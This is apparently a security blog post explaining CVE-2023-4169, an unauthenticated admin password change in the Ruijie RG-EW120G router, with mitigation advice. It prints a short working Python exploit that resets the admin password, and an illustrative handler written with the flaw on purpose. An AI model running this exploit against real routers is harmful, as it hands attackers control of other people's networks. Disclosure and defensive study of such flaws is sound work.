In July 2023, security researchers uncovered a critical vulnerability in the Ruijie RG-EW120G router firmware (version 1.(1)B1P5), tracked as CVE-2023-4169. This flaw affects the way the router handles administrator password changes. If exploited, it could allow remote attackers to take control of your home or office network with just a few simple HTTP requests.

What's worse, the vendor did not respond to early contact attempts about the issue, and a public exploit is now available, leaving thousands of devices at risk. This post explains the vulnerability, how it works, shows you example exploit code, and highlights what you can do about it.

What Is the Ruijie RG-EW120G?

The Ruijie RG-EW120G is a budget-friendly wireless router popular in Asia, especially for small offices and home use. With easy-to-use management and basic security controls, it's widely deployed. But this critical vulnerability undermines all those defenses if left unpatched.

The root of the problem lies in the router's password change feature:

- The router exposes an API endpoint at /api/sys/set_passwd. This endpoint should only allow authenticated (logged-in) administrators to change the admin password.
- Due to improper access controls, anybody on the local network, or on the Internet if the router's web management is exposed, can reach it. No login or admin session is required.

This is an Improper Access Control vulnerability (CWE-284): the device does not verify that a password change request comes from an authenticated administrator before honouring it.

Result:
An attacker can simply send a password change request and take control of the router, even from a remote location.
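To make the CWE-284 point concrete, here is an added example (not Ruijie's firmware code) of a constructed, in-memory model of a password-change handler: the vulnerable form trusts the request body alone, while the hardened form demands a live admin session and the current password before it will change anything. The Router class, its session store and the "initial-password" value are all assumptions made for this illustration.

```python
import hashlib
import hmac
import os
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed stand-in for the router's password-change handler, not vendor code.
# A "request" is just the JSON body (dict) plus an optional session cookie string.

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

@dataclass
class Router:
    salt: bytes = field(default_factory=lambda: os.urandom(16))
    admin_hash: bytes = b""
    sessions: dict = field(default_factory=dict)  # session token -> username

    def __post_init__(self):
        # Assumed factory credential for this model only.
        self.admin_hash = hash_password("initial-password", self.salt)

    def login(self, username: str, password: str) -> Optional[str]:
        if username == "admin" and hmac.compare_digest(
                hash_password(password, self.salt), self.admin_hash):
            token = secrets.token_hex(16)
            self.sessions[token] = username
            return token
        return None

    def vulnerable_set_passwd(self, body: dict, cookie: Optional[str] = None) -> int:
        # CWE-284: the body alone decides the outcome; nobody checks who sent it.
        self.admin_hash = hash_password(body["password"], self.salt)
        return 200

    def hardened_set_passwd(self, body: dict, cookie: Optional[str] = None) -> int:
        # 1. Require a live session that belongs to the admin account.
        if cookie is None or self.sessions.get(cookie) != "admin":
            return 401
        # 2. Re-prove possession of the current password (constant-time compare).
        old = hash_password(body.get("old_password", ""), self.salt)
        if not hmac.compare_digest(old, self.admin_hash):
            return 403
        self.admin_hash = hash_password(body["password"], self.salt)
        # 3. Drop every other session so a hijacked one cannot outlive the change.
        self.sessions = {cookie: "admin"}
        return 200
```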

Proof of Concept (PoC) Exploit

Here’s how easy it is to exploit this vulnerability. The attacker only needs the router’s IP address or DNS name!

import requests

# Change to your router IP
router_ip = "http://192.168.1.1"
api_endpoint = f"{router_ip}/api/sys/set_passwd"

# New credentials the attacker wants to set
payload = {
    "username": "admin",
    "password": "evilpassword123"
}

# No authentication or session needed!
response = requests.post(api_endpoint, json=payload, timeout=10)

if response.status_code == 200:
    print("[+] Password changed successfully. The router is now owned!")
else:
    print(f"[-] Failed to change the password! Status: {response.status_code}")

With this code (or using curl, Postman, etc.), attackers don’t need to know the old password. They simply set their own password for the admin account and log in with it.

- Firmware: 1.(1)B1P5
- File: /api/sys/set_passwd (Administrator Password Handler)
- CVE: CVE-2023-4169
- VDB: VDB-236185

Real-World Impact

If your router is vulnerable and exposed to the Internet (e.g., if remote management is enabled), anyone, anywhere can take it over in seconds. Inside a local network, an attacker just needs Wi-Fi access.

Once in control of the router, an attacker can, for example:

- Monitor network traffic
- Redirect users to phishing/malware sites

References

- NVD Entry CVE-2023-4169
- VulDB Detail VDB-236185
- Original Exploit Disclosure (Full details and PoC included)

Check Your Firmware:

Make sure your Ruijie RG-EW120G is not running version 1.(1)B1P5. If it is, contact your vendor for firmware updates immediately.

Watch for Firmware Updates:

Unfortunately, as of this writing, no official fix has been released, and the vendor has not responded to reports.

Replace If Needed:

If the vendor does not act, consider replacing the device with one from a vendor that actively supports and patches security issues.

Conclusion

CVE-2023-4169 is a simple but devastating flaw. It shows why router security matters, and why exposed APIs or default admin interfaces are dangerous. If you use a Ruijie RG-EW120G, act immediately to secure your network.

Stay safe, keep your firmware updated, and never ignore router security warnings.

*This post draws on the latest research and references and uses straightforward language to help every user understand the risk and how to respond.*

Timeline

Published on: 08/05/2023 18:15:00 UTC
Last modified on: 08/09/2023 19:24:00 UTC